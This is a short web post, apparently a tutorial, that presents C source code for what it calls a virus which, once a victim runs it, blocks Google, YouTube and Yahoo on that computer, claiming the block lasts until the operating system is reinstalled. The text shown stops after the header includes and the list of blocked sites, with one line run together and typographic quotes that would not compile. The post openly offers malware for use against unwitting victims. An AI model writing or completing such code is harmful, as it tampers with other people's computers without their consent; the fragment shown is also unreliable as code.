
How To Block Pesky Websites Using A Virus
Here is the source code for a 'C' Program to create a virus that can Block any web site from your Computer. If a victim clicks this virus atleast once, it will block a list websites that is specified on source code. This Victim can't visit any of the given sites unless he re-install his operating system...
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char...